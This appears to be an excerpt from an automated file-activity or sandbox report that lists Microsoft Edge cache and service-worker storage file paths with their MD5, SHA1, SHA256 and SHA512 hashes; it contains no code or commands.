SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM\Default\Cache\f_00000a

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\56d7b95c-365e-4bf3-b6ca-b21e7ce34af2\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe59e11f.TMP

MD5 6c1056aa9079fe7cbfbce921242101ee
SHA1 f05bd329b28e1ebd99658526a37ef8b08f15fa82
SHA256 db566572ec3265607ee6f90650e6f3eb3c9b30aeaf8fe725915ac5b0a41a253e
SHA512 e414d7b02caee348a7c7e296afac647ed6d8b817b63afd0754e9fe1e4c882203dbd6bdac90105932cf73cb5d80eff70f35057df42f905d675f476c22eb7b642e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM\Default\Code Cache\js\index-dir\the-real-index

MD5 66c53bcfb3e4ae74ded73ac6ebceb979
SHA1 8475d628e2b009f4029c4d7a61cdf49d7299241e
SHA256 625f1feb39c4997ab7bfac52361ff2dfe42345d1cb2b111201191073cbecbc13
SHA512 832371e23e45e036c003801344cd64fa794e86283d8290fcfa3be227ec59783f1473cdb7802a4ab79454195146d7e0ae7471c5e2495444047b1c8a92b6e00bb8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 74006673889bd24ac545e97d9865abbd
SHA1 43fe942b4f8623fd41768470849a60573da3ff72
SHA256 7bb8bc00ae09d6bf13058d511649964593529f267995fdc8bb580e2b9b576bc4
SHA512 86638c03d1a93e1f2627281c30f652c6ba36695d27c11963a0fc81cdf76afd657cf2913f57d6fda6accda8a537d02cd761820047804b57a0835de3921e7b0391

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM\Default\Code Cache\js\index-dir\the-real-index~RFe59df79.TMP

MD5 16ac3238a94afb32605d4eededd94e83
SHA1 3b6572dc9258ee8e51373967be9f9b53920859fa
SHA256 81424f4de36e4d864df2fea045920558dd528e68dd38aff08a961b652725abbf
SHA512 761b218b06424fc932d8d9190cc696040742f626f28a915f3b26a33f2a241870f4c2b980af51ba03a877acbc3ada3ded2de5f46d29fc92b3216103c495559843